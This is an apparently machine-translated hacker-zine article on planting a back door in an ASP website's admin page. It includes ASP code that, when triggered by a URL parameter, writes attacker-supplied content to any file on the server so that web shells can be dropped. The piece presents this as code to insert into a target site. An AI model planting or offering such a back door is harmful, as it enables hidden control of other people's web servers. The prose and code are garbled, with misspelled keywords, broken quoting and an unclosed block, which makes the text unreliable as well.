In-depth study of placement method of ASP back door

xiaoxiao2021-03-06  37

Author: Lcx. Source: hacker X file.

This is the landing page of our mobile network articles in this machine, and there is no difference in peace, and the original features exist. Look at the second picture:

Compared with Figure 1, the URL of Figure 1 is http://192.168.1.3/asp/wz/admin.asp, Figure 2 is http://192.168.1.3/ASP/WZ/Admin.asp?id=1, Add a parameter "? Id = 1" after admin..An. Figure 2 below, you can enter the file name in the front input box, the text box behind you can copy any code you want, and generate a button to generate CGI / ASP / PHP / ASPX, etc. Web pages back door or any text file. How did this do it? As long as you put this code according to the prompt modification, you can insert a ASP web code.

<%

ON Error ResMe next

ID = Request ("id")

If Request ("id") = 1 THEN

Testfile = Request.form ("name")

MSG = Request.form ("Message")

SET FS = Server.createObject ("scripting.filesystemobject")

Set thisfile = fs.opentextfile (Testfile, 8, true, 0)

thisfile.writeline ("& MSG &" ")

thisfile.close

SET FS = Nothing

%>

Value = <% = server.mappath ("xp.asp")% >>